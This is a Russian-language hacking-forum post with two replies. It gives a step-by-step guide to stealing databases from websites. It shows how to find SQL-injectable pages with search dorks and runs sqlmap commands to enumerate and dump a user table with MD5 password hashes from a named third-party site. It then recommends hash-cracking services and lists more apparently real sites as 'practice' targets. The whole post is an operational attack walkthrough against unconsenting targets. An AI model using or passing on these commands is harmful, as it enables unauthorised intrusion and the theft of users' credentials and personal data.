Мануал по сливу баз данных с сайтов

c0dpro

Всем привет, написал мануал по сливу баз данных с сайтов.
Для этого нам понадобится
Kali linux(так же он есть на win если хотите что бы я показал как сливать на нем пишите в коменты.
Дорки(поисковые запросы дял поиска сайтов с уязвимостью) их я оставлю в конце статьи в формате txt.

Шаг 1.
Первое что мы сделаем, это найдем сайты что уязвимы к SQL-инъекции. Есть очень много способов выявить её, но для меня самый лучший останеться поиск по доркам.
И так, пристуим.
Допустим вы ищите используя эту строку look.php?id= , и вы получили один из веб сайтов на примере этого:

Код:
http://www.wlnetwork.com/membership/look.php?id=69
что бы проверить его на уязвимость просто подставьте в конец ссылки «'» такой знак в результате вы должны получить вот это
Код:
http://www.wlnetwork.com/membership/look.php?id=69'
Если страница вернёт SQL ошибку, либо пропадет часть контента, значит страница уязвима для SQLMAP SQL-инъекции. Если она загружается или перенаправляет вас на другую страницу, переходите к следующей странице в результатах поиска Гугл.

посмотрите на скришоты ниже

Шаг 2
Строим список баз данных СУБД используя SQLMAP SQL-инъекцию
Заходим в терминал Linux и пишем вот такую команду
Код:
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 --dbs
Обзор команды
sqlmap — имя бинарного файла программы sqlmap.
-u — целевой адрес например ( http://www.wlnetwork.com/membership/look.php?id=69 )
--dbs — перечислить какие базы данных присутсвуют на сайте.[/spoiler]

и так, сейчас у нас всего 1 база данных, information_schema это стандартная база данных которая есть почти в каждом СУБД MySQL. Это значит что мы направим свой инетерс на бд wlndemc_membersdb.


Шаг 3
Построение списка таблиц базы данных.
Нам нужно знать как много таблицы имеются в СУБД этого веб-сайта и какие у них имена. Чтобы найти эту информацию выполните следующую команду:
Код:
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 -D wlndemc_membersdb --tables
Круто, это база имеет 114 таблиц.

Ну и конечно мы хотим проверить, что находится внутри think_user, используя SQLMAP SQL-инъекцию, поскольку, возможно, именно она содержит имя пользователя и пароль.
Шаг 4
Построение списка столбцов целевой таблицы.

Сейчас нам нужно построить список столбцов целевой таблицы admin базы данных нашего веб-сайта, используя SQLMAP SQL-инъекцию. SQLMAP SQL-инъекция делает это действительно простым, запустите следующую команду:
Код:
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 -D wlndemc_membersdb -T think_user --columns

Ага, вот и то что мы искали) осталось только вытянуть пароли и все остальное)

Шаг 5
С помощью SQLMAP SQL-инъекции построим список пользователей из целевого столбца выбранной базы данных.

всё это делаем вот такой командой:
Код:
sqlmap -u http://www.wlnetwork.com/membership/look.php?id=69 -D wlndemc_membersdb -T think_user --dump

как мы видим у нас пароли в виде хеша md5 вот самые лучшие сервисы который вам помогут расшифровать md5

cmd5.ru
crackstation.net
hashcracking.ru


Вот еще пару сайтов для тренеровки
https://bfgroup.io/blog-preview.php?id=8
http://www.ttn.si/cms/preview.php?id=32
http://petsstop.com/category.php?id=31
http://www.portraitsbywelcomeaboard.com/preview.php?id=1
дорки
https://yadi.sk/i/Sac8GG1N3Wjvhy
 
Reactions: Dok17543 and Frank

Shmell

Новорег
28 Май 2018
23
8
3
линукс не юзаю)
можешь на win запилить? благодыр
 

Frank

Софт|Халява
Пользователь
24 Май 2018
42
17
8
Вот то что я искал недавно, а то куча гайдов и не все работают.